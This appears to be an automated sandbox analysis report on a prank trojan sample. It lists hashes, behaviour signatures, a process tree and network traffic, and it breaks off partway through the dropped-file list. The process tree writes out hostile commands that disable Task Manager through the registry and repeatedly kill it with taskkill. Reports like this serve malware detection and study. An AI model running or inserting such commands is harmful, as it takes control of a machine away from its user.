| SHA256 | 2b5607e0eb6f48b007491a001da9b5de855940d3f1bde19c3539a05a146937eb |
| SHA512 | e64d864184464c71b5fb86ad6051eaaba1eeaf82335129a2544775b349e4e1fb8369bd6c5d4228c79d6c765e6adcfae51b226aac16bbb9b1f6b6dbd10b938e6a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b433a953635fade6e14593f9940dd216 |
| SHA1 | b946530ea19ac8aef371b70c73f4d324b4931710 |
| SHA256 | cd199208352569c4d5ba6b67f6963b38b734446b85c576a2291b84d226f0dac5 |
| SHA512 | 7ef23d9dae4392095a1101c82102b95316329edf856ea791d89fd81489237614017f5e2cca6ec12fbfc9c69f5e9e8649f2b103b7641b4ff2225bc0f86a5c792a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 705869d4cececde40cda4bf55f73df2e |
| SHA1 | aab7941cbca31ac1c2179d479758f96e85cb8149 |
| SHA256 | 26347317a437071655546d027d8a926d4ab4b23bf09fa5c121506a0592beb382 |
| SHA512 | ce80a81206e5e780e0c32b224bb26da59c23117f9d98a98a01e6a843cf58a87d78f4edfef0a533a6b1db80e6b789e73218011d52e3f8b37f7065ad1c5d9cf904 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5b6afc18ad3325b62d1e01db8b845712 |
| SHA1 | 1b79792edb8f73cf0604b776c3e98f37bd48c269 |
| SHA256 | 553252fc07c25c126623d4452c335c9f9257695247c836d02cb52a4d49d101cb |
| SHA512 | c6a2e07d075d3d312804714789f1a5a55591741f6ff64f2391b7e3d4c999bd20b37b707cc4d0a1440c57268ac613a64dc4e869d77554e7de104c6b64e59b66f7 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1a5ab0af8a300d71f72b5a1fca875ca4 |
| SHA1 | 5c092c777878b2892f705b6e2583eab251b1ecc3 |
| SHA256 | 598a88d0528180d3470bc16e0093d3af73a448be78058f2ccac8f83b0dc7fce6 |
| SHA512 | 52f72d6866b2daee97635ab8d8deb4b1b8ef91f381e3ce1e31a419cecb184bce075c9ee2d14105cf67259d716494d28796622bfb138756e59142e25c9f09f13b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d9be990ac475ebb8e2a157c1cb6c8601 |
| SHA1 | cdda972f09530c4bda4800d7efbabf0680166cd3 |
| SHA256 | 6964e08f197b73972f181a9d65decfd988ef1219222bc635b8dad57233b3550e |
| SHA512 | ec186f63d3bb5364dcfe90dad9438178ade00ddeb84ac29e87a2390780e108024d729ce1bdcf5e0c2c045c6d6ae4e907ebee6828eca899f2353a8de14d169458 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 042a2a4f8b8f938bc7dc4d7f37526d5a |
| SHA1 | db609701837651b271d853ade5466242cb517787 |
| SHA256 | 0b2fd78bd4c6979e4132a78b8b87dbff04085bc678712c5ea91fd138814f6724 |
| SHA512 | d2b3fe4e5ea76c6005bb08cf134353dfb738f5daab1091c8b5088cd53766a6680fb407fac4dfed71e3f3e792b926f9c78351cc86036265dc06d203ddee677a59 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9bafb57e52a318b1690a7fafef8b7179 |
| SHA1 | cece88e1f1a427cec2bb2fab93fd3cdfc022af3b |
| SHA256 | 47e7ba0c2930f3a58471d2b6aae7ec1944ad8977334fb96ab5090d945fd4dbaf |
| SHA512 | 8d9fa411313c91f2297d1cfebb6332050ae7ed54171378e8056476cac961cdb85d00780288b65168cfd8bf4dc9a0edceb01e5f510e7193af0fa89b41d6f18599 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9b250ca3a81472f7bbb59ef44b2551f4 |
| SHA1 | 52ab6683203c5bdbee202274e8ffc8c319dddcc2 |
| SHA256 | 8c12dcd6e5c31ecf4719c24222a2fdc6e7f97d701c34dc4cde5e9598e484d79f |
| SHA512 | 8a32897147f423b2c257bf879f57e208d42acacaa1de07363a4e7b6ae6e898be54c9673df8035630ee3b0f28bad960f00c92baf9415aa4dab89247cf5e97b227 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a614ade9b64ab55327c9d8761f8bfbc8 |
| SHA1 | 9664d22feedd80f4d3ec85c747590071225f150a |
| SHA256 | 313869e05945f48537ba973deee46d982798927678e8340f068cdb8c65c509e6 |
| SHA512 | 193534605b550e7158f39cd592598449d841303dd7711adf0356ac58a863414cc8ef4abc1e56855e0e279b5ffdd88eec726c671d1585b7bd7d99715360aa82e0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 97c56ccb80b537b05ec9482783cb6864 |
| SHA1 | 56daae4e60e992210831c89c26d4c63d4e8c3a62 |
| SHA256 | e064e778816b9cc6ad3252bb8a7ab69b341db508a15f460ec164a746eb63b99c |
| SHA512 | 0e6818b6e0e69be696a57384a4c3d2cc8f2350f72e0a448dbfa227b1294f490a6fd5ea6ce6408310e9e2d22fedfe64a0979f0d53531dd31e3fc9da7a95320907 |
Analysis: behavioral12
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win10v2004-20240226-en
Max time kernel
144s
Max time network
166s
Command Line
Signatures
Disables Task Manager via registry modification
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\R_O_13-27.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Dro trojan. Virus prank.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\START.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\START.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Killer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaking_horizontally.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\R_O_13-27.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Draw_cursor.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Error_icons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Inversion_and_oil.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New_Names.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaking_horizontally.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\START.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Killer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaking_horizontally.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\R_O_13-27.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Draw_cursor.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Error_icons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Inversion_and_oil.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaking_horizontally.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\START.exe | N/A |
Runs regedit.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Dro trojan. Virus prank.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Dro trojan. Virus prank.exe"
C:\Users\Admin\AppData\Local\Temp\START.exe
"C:\Users\Admin\AppData\Local\Temp\START.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ZbDz.vbs"
C:\Users\Admin\AppData\Local\Temp\Killer.exe
"C:\Users\Admin\AppData\Local\Temp\Killer.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZbDz.bat" "
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /f /v "DisableTaskMgr" /t REG_DWORD /d 1
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Taskmgr.exe /F
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Taskmgr.exe /F
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Taskmgr.exe /F
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Taskmgr.exe /F
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Taskmgr.exe /F
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /f /v "DisableTaskMgr" /t REG_DWORD /d 1
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Collapse_all.js"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SHK.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SHK.bat" "
C:\Users\Admin\AppData\Local\Temp\Shaking_horizontally.exe
Shaking_horizontally.exe
C:\Windows\SysWOW64\timeout.exe
timeout /t 1
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Shaking_horizontally.exe /F
C:\Users\Admin\AppData\Local\Temp\R_O_13-27.exe
"C:\Users\Admin\AppData\Local\Temp\R_O_13-27.exe"
C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\SysWOW64\regedit.exe
"C:\Windows\System32\regedit.exe"
C:\Users\Admin\AppData\Local\Temp\Draw_cursor.exe
"C:\Users\Admin\AppData\Local\Temp\Draw_cursor.exe"
C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Users\Admin\AppData\Local\Temp\Error_icons.exe
"C:\Users\Admin\AppData\Local\Temp\Error_icons.exe"
C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Users\Admin\AppData\Local\Temp\Inversion_and_oil.exe
"C:\Users\Admin\AppData\Local\Temp\Inversion_and_oil.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://neave.tv/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff897b846f8,0x7ff897b84708,0x7ff897b84718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,9670295908326733669,3400531076929216796,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1844 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2004,9670295908326733669,3400531076929216796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1844 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2004,9670295908326733669,3400531076929216796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2920 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,9670295908326733669,3400531076929216796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,9670295908326733669,3400531076929216796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\New_Names.exe
"C:\Users\Admin\AppData\Local\Temp\New_Names.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,9670295908326733669,3400531076929216796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,9670295908326733669,3400531076929216796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3540 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,9670295908326733669,3400531076929216796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3540 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,9670295908326733669,3400531076929216796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,9670295908326733669,3400531076929216796,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3088 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,9670295908326733669,3400531076929216796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,9670295908326733669,3400531076929216796,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:1
C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Users\Admin\AppData\Local\Temp\Shaking_horizontally.exe
"C:\Users\Admin\AppData\Local\Temp\Shaking_horizontally.exe"
Network
| Country | Destination | Domain | Proto |
| US | 138.91.171.81:80 | | tcp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.223.142.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | neave.tv | udp |
| US | 104.21.234.134:443 | neave.tv | tcp |
| US | 104.21.234.134:443 | neave.tv | tcp |
| US | 8.8.8.8:53 | neave.com | udp |
| US | 172.67.133.34:443 | neave.com | tcp |
| US | 8.8.8.8:53 | 47.242.123.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.234.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.133.67.172.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\START.exe
| MD5 | b9e9b7fbd019b7e09e77bdec78ade264 |
| SHA1 | 0cdeda0e10d1f754d2171596d82e97e347089e01 |
| SHA256 | 227e8953a11d22ea948fe3b2426753a435993336ae1f49a6fe3c1dd0b70bf3b7 |
| SHA512 | d2e5dadb63d0ff75e48504720186483877ecde0354fe56d88255a079c116eef5b5c59eaef6ccc99217acce5d5755fd0a50fcf93b115f9408962535a572960a85 |
memory/4156-74-0x0000000000EB0000-0x0000000000ECB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\MSVCR100D.dll
| MD5 | 440e9fd9824b8e97d3ca2f34bd1bfbd1 |
| SHA1 | 6852b2c592b3794da114d6ac5ea9d083317bf5af |
| SHA256 | eddaa890ac6470692f76eee9586c06d727a1caf7a242170ab1a3947523927396 |
| SHA512 | b458a0838159367727a63e417bba7c12b196f4d4af56703fe77ddcb2c28c3b6aab1d62335c513398f92c225f204e32b437fb49316b7c2b537c1cf877653c2ef8 |
C:\Users\Admin\AppData\Local\Temp\ZbDz.vbs
| MD5 | 8a25126b21c1f849b719999cb5d85e11 |
| SHA1 | 714fb5a246721c3117868c2229e7598ef7dfb2eb |
| SHA256 | 8ee9f21dd968d66fb71be502c6f2b96f3e0ee1954a4bcf2e7fffa45477fb7f38 |
| SHA512 | 8ea3d56e58410e369c42f6e16381ee802c8df58ee7f60ab937a19417e9a86f6877241ee7472df898bb85765d0bd3a5df2a58f97c717f5da8d32e7c8acf638c84 |
C:\Users\Admin\AppData\Local\Temp\Killer.exe
| MD5 | 32c1a77891071523637345563fcda855 |
| SHA1 | d582fa0290b7c04c99ded56c8ebc6e45df981300 |
| SHA256 | c8cb8941b2ebe27ba69600b8cb5725b9630fb631bd7c7e88dea9eebd8bd3bef3 |
| SHA512 | 61c6e7eddb5d8e880952c0fec6382082cbd33d0463ac556527598aaa6cf9bdb3755f395639d28be1a0cf4efa9f699cfdae06ecb5068b5f43b08b65354580704a |
memory/2920-82-0x0000000000AB0000-0x0000000000AF2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\msvcr100d.dll
| MD5 | c1fe947747fb29df287c1566dfd3a5c0 |
| SHA1 | 4f8243eb1bf6a06a13c7a375131b1476b9140adf |
| SHA256 | 3872ecdffe108283e4356280010355f857fc5dafa3e18b50021ec1acc51c4c57 |
| SHA512 | f180d5c8513d223853747540936cc63caa67ab2c85985b8a646d3689722a161b5b82e5e898d0c839ea41b1fed23f689b9e1da15b81b6712742d476854f6d4e9d |
C:\Users\Admin\AppData\Local\Temp\ZbDz.bat
| MD5 | 90716ec6d805a3e478c0a26477138efd |
| SHA1 | ceae2264e1c3c6a0bf715cf54237c3f763cd5799 |
| SHA256 | f185b92c729b011a051d2d8775eee998da9e71ba6156a8da81b0fc1b25c90a77 |
| SHA512 | fbda3613b691e83299077b1378aa845ab59befd61bc177e54b950f55c857c8e2b208012c026c24489f354c88404172ba25d7584f1b825ccd6880598bcc65cc56 |
C:\Users\Admin\AppData\Local\Temp\Collapse_all.js
| MD5 | f60e1a46f1e7301a7eb36f723cdec4b3 |
| SHA1 | 5e46742927659e3fb0cef6c67542cb5ec2b0926d |
| SHA256 | 5fdab6a87288b929290f603f813a254efa019d8fe6c73d8757ebc543ba6949eb |
| SHA512 | 945f7f053700cf18a80553e09c3d64c8481aeb70d871dd00106bf66fcb33b4360b4412cb4bf9391e4dfd8e6df92d11ffe896bee6f864bdbdddedc1877714ee16 |
C:\Users\Admin\AppData\Local\Temp\SHK.vbs
| MD5 | 2643272752b857cbc69d843d92ff4879 |
| SHA1 | 10f1f87652b5747dd37ed141734e5af39af19ef2 |
| SHA256 | 53c3cd2ed0f6184b2cf0304acfbef726c3415528c903c69a86f3f9405b52179c |
| SHA512 | 3e7d2548ccbe96599b94a585c6a02e2ee2820ac6a8aec1ede270c8089623c3c41fd779fdf5a93b2cd1b9fca3ef2d2b915703f3438c7abd6e27f5a59626f01282 |
C:\Users\Admin\AppData\Local\Temp\SHK.bat
| MD5 | ab921b5b6a2b7232c8d2fd2f0dc78790 |
| SHA1 | fe0c9c4e5255f903bf9b006f27a913f39a115a54 |
| SHA256 | dfd827c3e9bb39c84ca90001a7718c55458145fcf035b4dba1001b201422a8da |
| SHA512 | 47d8ded63fd55f4490d0cd64c8f688fc5bb5814018a09e46f1eae0e36228589f4097f88f2f42e92d02cc068fd3e807aae219a4c4162474a561b3767331e8f98e |
C:\Users\Admin\AppData\Local\Temp\Shaking_horizontally.exe
| MD5 | d2404ad25ee623edb58a175d4bb0c7a1 |
| SHA1 | 4ca3589e630abebffe46782f5941f6253001bea9 |
| SHA256 | 35ee2069ddde1c079b1890eafd7041f59eb5170063f3f308b0b808dcc24623ce |
| SHA512 | 26758e01881ccbfa5f124fb8fa15e1712d228ea1aa9e552dd5020436f55e4e83d450128e799aff829e6215eacfcb284133fdf3ca952696cadfe061477b8d0b8c |
memory/2588-91-0x0000000000440000-0x000000000045B000-memory.dmp
memory/4156-92-0x0000000000EB0000-0x0000000000ECB000-memory.dmp
memory/2920-93-0x0000000000AB0000-0x0000000000AF2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\R_O_13-27.exe
| MD5 | 7c3647e86215919ec06437d9a5fce95d |
| SHA1 | 7bc1a0582e03bd9d7ee5ba1d66268d800d66c596 |
| SHA256 | 39e30df6628702de8a548ff031383c360dfc63a9399169bb93838f7eef57a6ed |
| SHA512 | d0a4991ad1cff73dbd0425e9f7190101f27811daa622c0fa5ba620566a9f95caae4430b0386a6ea9a7575a56931a45ca821f5274f8d2798c73d5154c8fe7e33d |
memory/2060-96-0x0000000000620000-0x000000000063B000-memory.dmp
memory/2060-98-0x0000000000620000-0x000000000063B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Draw_cursor.exe
| MD5 | 4f5d56501b68860d79846d1c4a567459 |
| SHA1 | 548a514797c85e982a0f636030a18566895efaaa |
| SHA256 | 0df880855797fb52bcaac0e11074869ed409b9daaabfe8939ecd4039962292cd |
| SHA512 | 5efc549dcef528f0f5b09758ce18686106781788c0e78467d02fb12b7b138c0ca301d68e81305e7053f5471fa6c9c192d6bad81067fe70803e237b8dbf7d1f41 |
memory/980-101-0x0000000000D70000-0x0000000000D8B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Error_icons.exe
| MD5 | d9c07b7bc1a4df56ecb73941aafa2d78 |
